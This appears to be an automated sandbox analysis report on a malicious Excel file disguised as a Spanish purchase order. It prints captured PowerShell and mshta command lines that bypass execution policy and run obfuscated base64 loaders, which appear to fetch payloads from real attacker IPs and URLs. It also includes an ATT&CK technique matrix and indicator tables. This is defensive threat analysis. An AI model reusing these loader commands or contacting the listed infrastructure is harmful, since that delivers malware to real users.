        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
        Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'[base64 string omitted]'+[char]0x22+'))')))"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'[base64 string omitted]'+[char]0x22+'))')))"
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = '[base64 string omitted]';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
        Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 121 Scripting | Valid Accounts | 121 Command and Scripting Interpreter | 121 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 21 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Install Root Certificate | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        [Behavior graph: ID 1572123; Sample: Orden_de_Compra_Nmero_67829...; Start date: 10/12/2024; Architecture: WINDOWS; Score: 100]

        Source | Detection | Scanner | Label | Link
        Orden_de_Compra_Nmero_6782929219.xls | 13% | ReversingLabs | |
        Orden_de_Compra_Nmero_6782929219.xls | 15% | Virustotal | | Browse
        Orden_de_Compra_Nmero_6782929219.xls | 100% | Joe Sandbox ML | |

        No Antivirus matches

        Source | Detection | Scanner | Label | Link
        https://short.ruksk.com/BK | 100% | Avira URL Cloud | malware |
        http://172.245.142.60/#v | 0% | Avira URL Cloud | safe |
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFp | 0% | Avira URL Cloud | safe |
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFC: | 0% | Avira URL Cloud | safe |
        https://short.ruksk.com/der | 100% | Avira URL Cloud | malware |
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFdll | 0% | Avira URL Cloud | safe |
        https://short.ruksk.com/I | 100% | Avira URL Cloud | malware |
        https://short.ruksk.com/ILE | 100% | Avira URL Cloud | malware |
        http://172.245.142.60/ | 0% | Avira URL Cloud | safe |
        http://172.245.142.60/466/kidsni | 0% | Avira URL Cloud | safe |
        https://short.ruksk.com/ | 100% | Avira URL Cloud | malware |
        https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&ge | 100% | Avira URL Cloud | malware |
        https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift | 100% | Avira URL Cloud | malware |
        https://short.ruksk.com/3v | 100% | Avira URL Cloud | malware |
        http://go.cr | 0% | Avira URL Cloud | safe |
        http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta | 0% | Avira URL Cloud | safe |
        http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive. | 0% | Avira URL Cloud | safe |
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        paste.ee | 188.114.96.6 | true | false | | high
        cloudinary.map.fastly.net | 151.101.65.137 | true | false | | high
        short.ruksk.com | 54.150.207.131 | true | false | | high
        res.cloudinary.com | unknown | unknown | false | | high
        Name | Malicious | Antivirus Detection | Reputation
        http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta | true | Avira URL Cloud: safe | unknown
        https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift | false | Avira URL Cloud: malware | unknown
        https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg | false | | high
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF | true | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://short.ruksk.com/I | mshta.exe | false | Avira URL Cloud: malware | unknown
        http://nuget.org/NuGet.exe | powershell.exe | false | | high
        http://172.245.142.60/#v | mshta.exe | false | Avira URL Cloud: safe | unknown
        https://short.ruksk.com/ILE | mshta.exe | false | Avira URL Cloud: malware | unknown
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFdll | powershell.exe | false | Avira URL Cloud: safe | unknown
        https://short.ruksk.com/BK | mshta.exe | false | Avira URL Cloud: malware | unknown
        http://crl.entrust.net/server1.crl0 | mshta.exe, powershell.exe | false | | high
        http://ocsp.entrust.net03 | mshta.exe, powershell.exe | false | | high
        https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX | powershell.exe | false | | high
        http://172.245.142.60/ | mshta.exe | false | Avira URL Cloud: safe | unknown
        http://172.245.142.60/466/kidsni | powershell.exe | false | Avira URL Cloud: safe | unknown
        https://contoso.com/License | powershell.exe | false | | high
        https://contoso.com/Icon | powershell.exe | false | | high
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | mshta.exe, powershell.exe | false | | high
        http://www.diginotar.nl/cps/pkioverheid0 | mshta.exe, powershell.exe | false | | high
        https://short.ruksk.com/der | mshta.exe | false | Avira URL Cloud: malware | unknown
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFC: | powershell.exe | false | Avira URL Cloud: safe | unknown
        http://go.micros | powershell.exe | false | | high
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFp | powershell.exe | false | Avira URL Cloud: safe | unknown
        https://short.ruksk.com/ | mshta.exe | false | Avira URL Cloud: malware | unknown
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | mshta.exe, powershell.exe | false | | high
        https://short.ruksk.com/3v | mshta.exe | false | Avira URL Cloud: malware | unknown
        https://res.cloudinary.com | powershell.exe | false | | high
        https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&ge | mshta.exe | false | Avira URL Cloud: malware | unknown
        https://contoso.com/ | powershell.exe | false | | high
        https://nuget.org/nuget.exe | powershell.exe | false | | high
        http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive. | mshta.exe | false
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.444981624.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.508474117.0000000002171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.547256956.0000000002011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C36D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, 